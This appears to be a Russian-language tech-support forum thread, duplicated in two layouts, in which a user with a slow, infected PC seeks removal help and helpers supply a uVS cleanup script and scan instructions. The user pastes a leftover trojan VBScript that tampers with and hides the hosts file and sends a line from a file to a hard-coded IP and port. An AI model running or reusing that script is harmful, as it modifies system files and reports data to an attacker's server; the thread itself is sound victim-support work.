Жестко тупит комп

efremovxp · 08.10.2012, 01:36

Компьютер ужасно висит, не открываются половина сайтов. На rghost еле загрузил файлы (загружаются "через раз").
RSIT скачать не смог.
Другие программы для проверки, были уже установлены на компьютере.

ЦП загружен на 90-100% постоянно.
Подозреваю что причина в cmd.exe и svchost.exe (большая загрузка ЦП). При завершении процесса cmd.exe загрузка ЦП становится 10-20%.

Eset Smart Security нашел и удалил файл троян lomay_manya.bat в директории C:\Program Files\j1\j1
От трояна остались файлы ko.txt и test.vbs
Содержимое test.vbs

Код:

Set oFSO = CreateObject ("Scripting.FileSystemObject") 
sWinDir = oFSO.GetSpecialFolder (0) 
'WScript.Echo sWinDir
set fso = CreateObject("Scripting.FileSystemObject") 
 set ts = fso.OpenTextFile(sWinDir+"\System32\drivers\etc\hоsts", 8, true, -2) 
 'ts.WriteLine "Инфа" 
 ts.CLOSE 
 'Скрываем файл 
 set fso = CreateObject("Scripting.FileSystemObject") 
 set file = fso.GetFile(sWinDir+"\System32\drivers\etc\hosts") 
 file.Attributes = 2

Const strFilePath = "ko.txt"
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
Dim fso, objFile, objNewFile, s
 
Set fso = CreateObject("Scripting.FileSystemObject")
'открываем файл для чтения    
Set objFile = fso.OpenTextFile(strFilePath,1)
s=objFile.ReadLine

Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://94.249.190."+"123:45612/stat/tuk/"+s, False
o.send

Содержимое ko.txt

Код:

uVS
AVZ
hijackthis

---------- Добавлено в 23:36 ---------- Предыдущее сообщение было написано в 23:17 ----------

Кое как скачал RSIT )
RSIT

Angel-iz-Ada · 08.10.2012, 02:12

Здравствуйте!

Выполните следующий скрипт в uVS:
- запускаете программу еще раз, ожидаете пока закончится построения списка (убедитесь что программа извлечена из архива в отдельную папку. не нужно запускать ее из самого архива);
- копируете следующий текст из поля "Код" в буфер обмена (выделяете текст мышкой, затем щелкаете правой кнопкой и выбираете Копировать текст);

Код:

;;uVS v3.76 script [http://dsrt.dyndns.org]
;Target OS: NTv6.1

delref COPY
delall %Sys32%\HALE.EXE
delall %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\BD84.TMP\HALE.CMD"
bl 2D9A30606A718BFDB4E5E9B6C2939881 19968
delall %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\BD84.TMP\BUMP.EXE
deltmp
delnfr
restart

- затем слева наверху выбираете пункт Скрипт - Выполнить скрипт находящийся в буфере обмена;
- скрипт должен автоматически появиться в этом окне. если он не появился или там находится не то что вы скопировали, то удаляете содержимое и вставляете текст скрипта правой кнопкой мыши;
- обязательно закрываете все открытые браузеры (Opera, Mozilla, IE), отключаете в антивирусе защиту (обычно правой кнопкой мыши по иконке в трее - Временно отключить защиту или т.п.) и жмете в uVS кнопку Выполнить;
- ждете окончания выполнения скрипта в программе. если будут появляться различные запросы на удаление программ, то везде нажимаем кнопки Да или Далее;
- по окончанию выполнения скрипта компьютер перезагрузится.
- после перезагрузки делаем лог Mbam как написано здесь (можно выполнить быструю проверку, а не полную). программу можно скачать отсюда. ссылку на лог выложить сюда.

efremovxp · 08.10.2012, 03:30

Malwarebytes Anti-Malware 1.65.0.1400
www.malwarebytes.org

Версия базы данных: v2012.10.07.04

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 9.0.8112.16421
Admin :: ADMIN [администратор]

08.10.2012 2:16:54
mbam-log-2012-10-08 (02-16-54).txt

Тип сканирования: Быстрое сканирование
Опции сканирования включены: Память | Запуск | Реестр | Файловая система | Эвристика/Дополнительно | Эвристика/Шурикен | PUP | PUM
Опции сканирования отключены: P2P
Просканированные объекты: 200902
Времени прошло: 10 минут , 27 секунд

Обнаруженные процессы в памяти: 0
(Вредоносных программ не обнаружено)

Обнаруженные модули в памяти: 0
(Вредоносных программ не обнаружено)

Обнаруженные ключи в реестре: 0
(Вредоносных программ не обнаружено)

Обнаруженные параметры в реестре: 0
(Вредоносных программ не обнаружено)

Объекты реестра обнаружены: 0
(Вредоносных программ не обнаружено)

Обнаруженные папки: 1
C:\Recycle.Bin (Trojan.Spyeyes) -> Действие не было предпринято.

Обнаруженные файлы: 1
C:\Recycle.Bin\FFCD3CFF47B8880 (Trojan.Spyeyes) -> Действие не было предпринято.

(конец)

Vvvyg · 08.10.2012, 13:31

Удалите найденное в MBAM.
Если проблема решена, выполните скрипт проверки уязвимостей в AVZ.

---------- Добавлено в 12:31 ---------- Предыдущее сообщение было написано в 08:59 ----------

efremovxp, а Вы рекомендации и отсюда тоже выполняете?

08.10.2012, 01:36	#1 (ссылка)
efremovxp Новичок Регистрация: 17.05.2010 Сообщений: 66 Репутация: 0	Жестко тупит комп Компьютер ужасно висит, не открываются половина сайтов. На rghost еле загрузил файлы (загружаются "через раз"). RSIT скачать не смог. Другие программы для проверки, были уже установлены на компьютере. ЦП загружен на 90-100% постоянно. Подозреваю что причина в cmd.exe и svchost.exe (большая загрузка ЦП). При завершении процесса cmd.exe загрузка ЦП становится 10-20%. Eset Smart Security нашел и удалил файл троян lomay_manya.bat в директории C:\Program Files\j1\j1 От трояна остались файлы ko.txt и test.vbs Содержимое test.vbs Код: Set oFSO = CreateObject ("Scripting.FileSystemObject") sWinDir = oFSO.GetSpecialFolder (0) 'WScript.Echo sWinDir set fso = CreateObject("Scripting.FileSystemObject") set ts = fso.OpenTextFile(sWinDir+"\System32\drivers\etc\hоsts", 8, true, -2) 'ts.WriteLine "Инфа" ts.CLOSE 'Скрываем файл set fso = CreateObject("Scripting.FileSystemObject") set file = fso.GetFile(sWinDir+"\System32\drivers\etc\hosts") file.Attributes = 2 Const strFilePath = "ko.txt" Dim o Set o = CreateObject("MSXML2.XMLHTTP") Dim fso, objFile, objNewFile, s Set fso = CreateObject("Scripting.FileSystemObject") 'открываем файл для чтения Set objFile = fso.OpenTextFile(strFilePath,1) s=objFile.ReadLine Set o = CreateObject("MSXML2.XMLHTTP") o.open "GET", "http://94.249.190."+"123:45612/stat/tuk/"+s, False o.send Содержимое ko.txt Код: 169 uVS AVZ hijackthis ---------- Добавлено в 23:36 ---------- Предыдущее сообщение было написано в 23:17 ---------- Кое как скачал RSIT ) RSIT

08.10.2012, 02:12	#2 (ссылка)
Angel-iz-Ada Эксперт Регистрация: 06.11.2011 Сообщений: 8,232 Репутация: 864	Здравствуйте! Выполните следующий скрипт в uVS: - запускаете программу еще раз, ожидаете пока закончится построения списка (убедитесь что программа извлечена из архива в отдельную папку. не нужно запускать ее из самого архива); - копируете следующий текст из поля "Код" в буфер обмена (выделяете текст мышкой, затем щелкаете правой кнопкой и выбираете Копировать текст); Код: ;;uVS v3.76 script [http://dsrt.dyndns.org] ;Target OS: NTv6.1 delref COPY delall %Sys32%\HALE.EXE delall %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\BD84.TMP\HALE.CMD" bl 2D9A30606A718BFDB4E5E9B6C2939881 19968 delall %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\BD84.TMP\BUMP.EXE deltmp delnfr restart - затем слева наверху выбираете пункт Скрипт - Выполнить скрипт находящийся в буфере обмена; - скрипт должен автоматически появиться в этом окне. если он не появился или там находится не то что вы скопировали, то удаляете содержимое и вставляете текст скрипта правой кнопкой мыши; - обязательно закрываете все открытые браузеры (Opera, Mozilla, IE), отключаете в антивирусе защиту (обычно правой кнопкой мыши по иконке в трее - Временно отключить защиту или т.п.) и жмете в uVS кнопку Выполнить; - ждете окончания выполнения скрипта в программе. если будут появляться различные запросы на удаление программ, то везде нажимаем кнопки Да или Далее; - по окончанию выполнения скрипта компьютер перезагрузится. - после перезагрузки делаем лог Mbam как написано здесь (можно выполнить быструю проверку, а не полную). программу можно скачать отсюда. ссылку на лог выложить сюда.

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Комп стал жёстко тормозить!!!(((	JustAs	Неисправности, настройка	24	23.05.2012 11:09
жёстко тормозит комп!!!!!(грузится~ 5-7 минут)	osmat	Безопасность	24	06.05.2012 22:27
комп тормозит жестко	vaso.21	Windows XP	7	10.05.2011 07:20
Комп тупит жёстко	Антон_!	Неисправности, настройка	6	20.05.2009 17:50
Люди у меня комп заглючил!!!!!!!! тормозит жестко!!!!!	Monorox	Windows XP	10	04.04.2009 20:04

08.10.2012, 03:30	#3 (ссылка)
efremovxp Новичок Регистрация: 17.05.2010 Сообщений: 66 Репутация: 0	Malwarebytes Anti-Malware 1.65.0.1400 www.malwarebytes.org Версия базы данных: v2012.10.07.04 Windows 7 Service Pack 1 x86 NTFS Internet Explorer 9.0.8112.16421 Admin :: ADMIN [администратор] 08.10.2012 2:16:54 mbam-log-2012-10-08 (02-16-54).txt Тип сканирования: Быстрое сканирование Опции сканирования включены: Память \| Запуск \| Реестр \| Файловая система \| Эвристика/Дополнительно \| Эвристика/Шурикен \| PUP \| PUM Опции сканирования отключены: P2P Просканированные объекты: 200902 Времени прошло: 10 минут , 27 секунд Обнаруженные процессы в памяти: 0 (Вредоносных программ не обнаружено) Обнаруженные модули в памяти: 0 (Вредоносных программ не обнаружено) Обнаруженные ключи в реестре: 0 (Вредоносных программ не обнаружено) Обнаруженные параметры в реестре: 0 (Вредоносных программ не обнаружено) Объекты реестра обнаружены: 0 (Вредоносных программ не обнаружено) Обнаруженные папки: 1 C:\Recycle.Bin (Trojan.Spyeyes) -> Действие не было предпринято. Обнаруженные файлы: 1 C:\Recycle.Bin\FFCD3CFF47B8880 (Trojan.Spyeyes) -> Действие не было предпринято. (конец)

08.10.2012, 13:31	#4 (ссылка)
Vvvyg Эксперт Регистрация: 25.05.2011 Сообщений: 9,136 Репутация: 811	Удалите найденное в MBAM. Если проблема решена, выполните скрипт проверки уязвимостей в AVZ. ---------- Добавлено в 12:31 ---------- Предыдущее сообщение было написано в 08:59 ---------- efremovxp, а Вы рекомендации и отсюда тоже выполняете?

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Ads